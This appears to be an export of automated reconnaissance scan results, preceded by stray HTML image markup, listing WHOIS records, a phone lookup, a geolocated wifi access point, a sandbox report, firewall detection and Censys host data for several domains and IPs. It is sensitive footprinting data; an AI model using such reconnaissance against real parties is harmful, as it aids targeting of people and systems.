<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:12:55 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+14806242598', u'local_format': u'4806242598', u'number': u'14806242598', u'valid': True, u'line_type': u'landline', u'location': u'Phoenix', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} | +14806242598 |
| 2023-05-12 03:24:30 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | Network Solutions, LLC | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:A1:42:A6) | 39.0469, -77.4903 |
| 2023-05-12 02:58:21 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://hui-zhou.netlify.app/index.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_638_ConnHashTable<1592>_HashTable_Mutex"\n "IsoScope_638_IESQMMUTEX_0_303"\n "IsoScope_638_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_638_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_638_IE_EarlyTabStart_0xf34_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1592"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_638_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\_!SHMSFTHISTORY!_"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "TCKAJPB5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TCKAJPB5.txt]- [targetUID: 00000000-00001592]\n Dropped file: "36ZSW8Z3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36ZSW8Z3.txt]- [targetUID: 00000000-00001592]\n Dropped file: "MRKVEKYP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MRKVEKYP.txt]- [targetUID: 00000000-00001592]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DFA8153985C10DD229.TMP" has type "data"- Location: [%TEMP%\\~DFA8153985C10DD229.TMP]- [targetUID: 00000000-00001592]\n "~DF0435E689B517C6FA.TMP" has type "data"- Location: [%TEMP%\\~DF0435E689B517C6FA.TMP]- [targetUID: 00000000-00001592]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "TCKAJPB5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TCKAJPB5.txt]- [targetUID: 00000000-00001592]\n "_A8449244-8194-11ED-8425-080027616BD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D7364101-8192-11ED-8425-080027616BD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "36ZSW8Z3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36ZSW8Z3.txt]- [targetUID: 00000000-00001592]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFD5A898F84D577C98.TMP" has type "data"- Location: [%TEMP%\\~DFD5A898F84D577C98.TMP]- [targetUID: 00000000-00001592]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001592]\n "~DF4601B0A7A8A27A0A.TMP" has type "data"- Location: [%TEMP%\\~DF4601B0A7A8A27A0A.TMP]- [targetUID: 00000000-00001592]\n "MRKVEKYP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MRKVEKYP.txt]- [targetUID: 00000000-00001592]\n "index_1_.webmanifest" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._D73640FF-8192-11ED-8425-080027616BD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 548\nContent-Type: application/octet-stream\nDate: Thu, 22 Dec 2022 01:42:19 GMT\nEtag: "4ee59b3d2e9da012cec25867fea8b48f-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nX-Nf-Request-Id: 01GMVQXQJ1YFJJ3B3XD9AQHCH0\n\n{\n "name": "Job Candidate",\n "short_name": "Job Candidate",\n "lang": "en-us",\n "theme_color": "#2962ff",\n "background_color": "#2962ff",\n "icons": [{\n "src": "/images/icon_hu0b7a4cb9992c9ac0e91bd28ffd38dd00_9727_192x192_fill_lanczos_center_2.png",\n "sizes": "192x192",\n "type": "image/png"\n }, {\n "src": "/images/icon_hu0b7a4cb9992c9ac0e91bd28ffd38dd00_9727_512x512_fill_lanczos_center_2.png",\n "sizes": "512x512",\n "type": "image/png"\n }],\n "display": "standalone",\n "start_url": "/?utm_source=web_app_manifest"\n}"\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 404 Not Found\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Encoding: gzip\nContent-Type: text/html; charset=utf-8\nDate: Thu, 22 Dec 2022 01:42:22 GMT\nEtag: 1655429792-ssl-df\nServer: Netlify\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nVary: Accept-Encoding\nX-Nf-Request-Id: 01GMVQXTEARV5HP7YS58XJPHJZ\nTransfer-Encoding: chunked"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://hui-zhou.netlify.app/index.webmanifest"\n Pattern match: "https://hui-zhou.netlify.app"'}], u'threat_level': 0, u'size': None, u'job_id': u'63a3b3d1ddf29718d50a1530', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'suspicious_identifiers': [], u'attck_id': u'T1071.001', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Web Protocols', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers' | 34.74.170.74 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.164): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:53:02 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://nwapi.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nwapi.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | nwapi.battleb0t.xyz |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | akashpmani.github.io | 185.199.109.153 |
| 2023-05-12 02:54:22 | HTTP Headers | No | Web Spider | 10 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} | www.ayhu.xyz |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://www.patreon.com/skyhelper | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 02:54:54 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T12:33:03.766Z", "ip": "2a06:98c1:3121::1", "location_updated_at": "2023-05-06T23:05:13.627091Z", "autonomous_system_updated_at": "2023-05-06T23:05:13.627138Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"karriere-job-booster.com": {"record_type": "AAAA", "resolved_at": "2023-03-23T15:40:36.428770073Z"}, "uncoveryourconfidence.org": {"record_type": "AAAA", "resolved_at": "2023-03-24T20:43:37.500409594Z"}, "question-orthographe.net": {"record_type": "AAAA", "resolved_at": "2022-12-25T11:23:33.248567488Z"}, "kfplastics.com.au": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:22:37.294872821Z"}, "ozvi.net": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:04:48.328410124Z"}, "romainebrain.dev": {"record_type": "AAAA", "resolved_at": "2023-02-18T04:11:46.139927410Z"}, "static.sampledu.com": {"record_type": "AAAA", "resolved_at": "2023-02-01T22:23:03.363402875Z"}, "cpcontacts.madares.app": {"record_type": "AAAA", "resolved_at": "2023-04-16T12:14:57.712576745Z"}, "vadyba.lt": {"record_type": "AAAA", "resolved_at": "2023-03-19T16:29:40.486687881Z"}, "openspeedtest.ovride.net": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:05:02.904720123Z"}, "www.3e-wellness.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:03:48.794666765Z"}, "405.hjs.my.id": {"record_type": "AAAA", "resolved_at": "2023-04-12T11:14:59.074372516Z"}, "mail.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "dusfer.com": {"record_type": "AAAA", "resolved_at": "2022-12-29T13:18:33.050196113Z"}, "beautybeyondhair.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T18:46:00.761081322Z"}, "beautybeyondhair.buzz": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:48:08.422852392Z"}, "wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "askapkmod.com": {"record_type": "AAAA", "resolved_at": "2022-12-26T12:52:46.077237913Z"}, "gbdfdm.cn": {"record_type": "AAAA", "resolved_at": "2023-02-17T02:28:21.988085793Z"}, "www.cylindermowers.com.au": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:22:39.710895641Z"}, "karriere-job-booster.at": {"record_type": "AAAA", "resolved_at": "2023-04-30T12:17:10.484433310Z"}, "www.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-16T17:06:44.448663582Z"}}, "names": ["www.cylindermowers.com.au", "dusfer.com", "www.wolny.poker", "question-orthographe.net", "kfplastics.com.au", "wolny.poker", "beautybeyondhair.net", "uncoveryourconfidence.org", "romainebrain.dev", "karriere-job-booster.at", "karriere-job-booster.com", "static.sampledu.com", "ozvi.net", "vadyba.lt", "beautybeyondhair.buzz", "cpcontacts.madares.app", "openspeedtest.ovride.net", "405.hjs.my.id", "www.3e-wellness.com", "gbdfdm.cn", "askapkmod.com", "mail.wolny.poker"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://[2a06:98c1:3121::1]/"}, "response": {"body": "<!DOCTYPE html>\n<!--[if lt IE 7]> <html class=\"no-js ie6 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 7]> <html class=\"no-js ie7 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 8]> <html class=\"no-js ie8 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if gt IE 8]><!--> <html class=\"no-js\" lang=\"en-US\"> <!--<![endif]-->\n<head>\n<title>Direct IP access not allowed | Cloudflare</title>\n<meta charset=\"UTF-8\" />\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" />\n<meta name=\"robots\" content=\"noindex, nofollow\" />\n<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\" />\n<link rel=\"stylesheet\" id=\"cf_styles-css\" href=\"/cdn-cgi/styles/main.css\" />\n\n\n<script>\n(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&JSON.stringify){var e=function(a){var c=document.getElementById(\"error-feedback-survey\"),d=document.getElementById(\"error-feedback-success\"),b=new XMLHttpRequest;a={event:\"feedback clicked\",properties:{errorCode:1003,helpful:a,version:1}};b.open(\"POST\",\"https://sparrow.cloudflare.com/api/v1/event\");b.setRequestHeader(\"Content-Type\",\"application/json\");b.setRequestHeader(\"Sparrow-Source-Key\",\"c771f0e4b54944bebf4261d44bd79a1e\");\nb.send(JSON.stringify(a));c.classList.add(\"feedback-hidden\");d.classList.remove(\"feedback-hidden\")};document.addEventListener(\"DOMContentLoaded\",function(){var a=document.getElementById(\"error-feedback\"),c=document.getElementById(\"feedback-button-yes\"),d=document.getElementById(\"feedback-button-no\");\"classList\"in a&&(a.classList.remove(\"feedback-hidden\"),c.addEventListener(\"click\",function(){e(!0)}),d.addEventListener(\"click\",function(){e(!1)}))})}})();\n</script>\n\n<script defer src=\"https://performance.radar.cloudflare.com/beacon.js\"></script>\n</head>\n<body>\n <div id=\"cf-wrapper\">\n <div class=\"cf-alert cf-alert-error cf-cookie-error hidden\" id=\"cookie-alert\" data-translate=\"enable_cookies\">Please enable cookies.</div>\n <div id=\"cf-error-details\" class=\"p-0\">\n <header class=\"mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased\">\n <h1 class=\"inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight\">\n <span data-translate=\"error\">Error</span>\n <span>1003</span>\n </h1>\n <span class=\"inline-block md:block heading-ray-id font-mono text-15 lg:text-sm lg:leading-relaxed\">Ray ID: 7c552e7289ff8729 •</span>\n <span class=\"inline-block md:block heading-ray-id font-mono text-15 lg:text-sm lg:leading-relaxed\">2023-05-10 21:12:37 UTC</span>\n <h2 class=\"text-gray-600 leading-1.3 text-3xl lg:text-2xl font-light\">Direct IP access not allowed</h2>\n </header>\n\n <section class=\"w-240 lg:w-full mx-auto mb-8 lg:px-8\">\n <div id=\"what-happened-section\" class=\"w-1/2 md:w-full\">\n <h2 class=\"text-3xl leading-tight font-normal mb-4 text-black-dark antialiased\" data-translate=\"what_happened\">What happened?</h2>\n <p>You've requested an IP address that is part of the <a href=\"https://www.cloudflare.com/5xx-error-landing/\" target=\"_blank\">Cloudflare</a> network. A valid Host header must be supplied to reach the desired website.</p>\n \n </div>\n\n \n <div id=\"resolution-copy-section\" class=\"w-1/2 mt-6 text-15 leading-normal\">\n <h2 class=\"text-3xl leading-tight font-normal mb-4 text-black-dark antialiased\" data-translate=\"what_can_i_do\">What can I do?</h2>\n <p>If you are interested in learning more about Cloudflare, please <a href=\"https://www.cloudflare.com/5xx-error-landing/\" target=\"_blank\">visit our website</a>.</p>\n </div>\n \n </section>\n\n <div class=\"feedback-hidden py-8 text-center\" id=\"error-feedback\">\n <div id=\"error-feedback-survey\" class=\"footer-line-wrapper\">\n Was this page helpful?\n <button class=\"border border-solid bg-white cf-button cursor-pointer ml-4 px-4 py-2 rounded\" id=\"feedback-button-yes\" type=\"button\">Yes</button>\n <button class=\"border border-solid bg-white cf-button cursor-pointer ml-4 px-4 py-2 rounded\" id=\"feedback-button-no\" type=\"button\">No</button>\n </div>\n <div class=\"feedback-success feedback-hidden\" id=\"error-feedback-success\">\n Thank you for your feedback!\n </div>\n</div>\n\n\n <div class=\"cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300\">\n <p class=\"text-13\">\n <span class=\"cf-footer-item sm:block sm:mb-1\">Cloudflare Ray ID: <strong class=\"font-semibold\">7c552e7289ff8729</strong></span>\n <span class=\"cf-footer-separator sm:hidden\">•</span>\n <span id=\"cf-footer-item-ip\" class=\"cf-footer-item hidden sm:block sm:mb-1\">\n Your IP:\n <button type=\"button\" 